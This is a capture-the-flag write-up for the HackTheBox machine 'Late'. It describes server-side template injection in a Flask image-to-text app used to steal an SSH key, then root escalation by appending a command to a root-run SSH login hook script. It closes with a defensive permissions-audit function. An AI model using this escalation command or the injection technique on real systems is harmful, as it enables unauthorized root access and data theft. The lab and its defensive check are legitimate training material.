Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 23 Apr 2022
IP: 10.10.11.156

HackTheBox's Late is an easy-level Linux machine.

Enumeration

Nmap scan result:

# Nmap 7.92 scan initiated Mon Apr 25 12:18:35 2022 as: nmap -sC -sV -oN scan.nmap -vvv 10.10.11.156
Nmap scan report for 10.10.11.156
Host is up, received echo-reply ttl 63 (0.048s latency).
Scanned at 2022-04-25 12:18:36 UTC for 12s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSqIcUZeMzG+QAl/4uYzsU98davIPkVzDmzTPOmMONUsYleBjGVwAyLHsZHhgsJqM9lmxXkb8hT4ZTTa1azg4JsLwX1xKa8m+RnXwJ1DibEMNAO0vzaEBMsOOhFRwm5IcoDR0gOONsYYfz18pafMpaocitjw8mURa+YeY21EpF6cKSOCjkVWa6yB+GT8mOcTZOZStRXYosrOqz5w7hG+20RY8OYwBXJ2Ags6HJz3sqsyT80FMoHeGAUmu+LUJnyrW5foozKgxXhyOPszMvqosbrcrsG3ic3yhjSYKWCJO/Oxc76WUdUAlcGxbtD9U5jL+LY2ZCOPva1+/kznK8FhQN
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBMen7Mjv8J63UQbISZ3Yju+a8dgXFwVLgKeTxgRc7W+k33OZaOqWBctKs8hIbaOehzMRsU7ugP6zIvYb25Kylw=
| 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIGrWbMoMH87K09rDrkUvPUJ/ZpNAwHiUB66a/FKHWrj
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 25 12:18:48 2022 -- 1 IP address (1 host up) scanned in 12.91 seconds

Foothold

Let's open the web page in the browser.

Then add images.late.htb to the /etc/hosts file.

Let's go to images.late.htb in the browser.

The site is built with Flask, which suggests it could be vulnerable to server-side template injection (SSTI).

The application converts uploaded images into text. So we write the payload in an editor and take a screenshot of it, like the one below.

Here’s an example of a payload image.

Upload the image into the application.

After the image payload is uploaded, the application returns a result.txt file containing the output of the evaluated payload. This confirms that the application is vulnerable to SSTI.

User Flag

So we can exploit the SSTI by calling os.popen().read().

Here’s an example of a payload.

Successfully executed.

I'm attempting to obtain the svc_acc user's SSH key.

Here is the payload for obtaining the user's SSH key.

We have the user's SSH key.

Save the key to a file named svc_acc_key and restrict its permissions.

chmod 600 svc_acc_key
ssh -i svc_acc_key svc_acc@late.htb
svc_acc@late:~$ cat user.txt
49a7b4001ac25b6969a8cff2af9xxxxx
svc_acc@late:~$

Got User Flag.

Root Flag

Nothing appears to be interesting or suspicious after running the linpeas.sh script.

I discovered something interesting after monitoring the running processes.

2022/05/08 09:14:02 CMD: UID=0 PID=25096 | cp /root/scripts/ssh-alert.sh /usr/local/sbin/ssh-alert.sh
2022/05/08 09:14:02 CMD: UID=0 PID=25093 | /bin/bash /root/scripts/cron.sh
2022/05/08 09:14:02 CMD: UID=0 PID=25092 | /bin/sh -c /root/scripts/cron.sh
2022/05/08 09:14:02 CMD: UID=0 PID=25091 | /usr/sbin/CRON -f

Let's analyze the /usr/local/sbin/ssh-alert.sh script.

svc_acc@late:/tmp$ cat /usr/local/sbin/ssh-alert.sh 
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

Every time someone logs in over SSH, this script sends an email to root with the username, date, and server name of the login.

Since the script runs as root on every login, we can take advantage of it to execute commands as root.

I attempted to modify the entire script but was unable to do so.

As a result, I only appended a command.

echo "cat /root/root.txt > /tmp/root.txt;chown svc_acc:svc_acc /tmp/root.txt" >> /usr/local/sbin/ssh-alert.sh

After that, SSH in as the user again. Our modified script is run as root on login.

ssh -i svc_acc_key svc_acc@late.htb
svc_acc@late:~$ cat /tmp/root.txt
6edb2bd94bb6168c9943e2d77adxxxxx
svc_acc@late:~$

Boom... Got the root flag.
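The root-cause of this escalation is a script that root executes (via cron and the SSH login hook) but that a low-privileged user can modify. The following is an added defender-side check, not part of the original writeup: it audits such a hook for non-root ownership, group/world write bits on the file or its directory, symlinks, and (when lsattr is present) the append-only attribute. It assumes GNU coreutils stat on Linux.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Audit a script that a
# privileged process (cron job, PAM login hook) executes and report anything
# that would let a non-root user change what root runs.
# Assumes GNU coreutils stat (Linux); lsattr is used only when available.
# Returns 0 only when no finding was printed.
audit_root_hook() {
    hook=$1
    owner_expected=${2:-root}   # owner the hook should have; root by default
    findings=0

    if [ ! -e "$hook" ]; then
        echo "MISSING $hook"
        return 1
    fi
    # A symlink lets whoever controls the link choose what root executes.
    if [ -L "$hook" ]; then
        echo "SYMLINK $hook"
        findings=$((findings + 1))
    fi
    # Check the script and its directory: a writable directory allows the
    # file to be replaced even when the file itself is locked down.
    for target in "$hook" "$(dirname "$hook")"; do
        owner=$(stat -c %U "$target")
        perms=$(stat -c %A "$target")       # e.g. -rwxrwxr-x
        if [ "$owner" != "$owner_expected" ]; then
            echo "OWNER $target owned by $owner, expected $owner_expected"
            findings=$((findings + 1))
        fi
        case $perms in                       # 6th char: group write bit
            ?????w*) echo "GROUP_WRITABLE $target ($perms)"
                     findings=$((findings + 1)) ;;
        esac
        case $perms in                       # 9th char: other write bit
            ????????w*) echo "WORLD_WRITABLE $target ($perms)"
                        findings=$((findings + 1)) ;;
        esac
    done
    # An append-only attribute blocks rewriting but not appending, which is
    # enough to add a line to a shell script that root will run.
    if command -v lsattr >/dev/null 2>&1; then
        attrs=$(lsattr -d "$hook" 2>/dev/null | cut -d' ' -f1)
        case $attrs in
            *a*) echo "APPEND_ONLY $hook ($attrs)"
                 findings=$((findings + 1)) ;;
        esac
    fi
    [ "$findings" -eq 0 ]
}
```

Run it as `audit_root_hook /usr/local/sbin/ssh-alert.sh` on a host like this one; the group-writable bit on the copied script is exactly what the check reports.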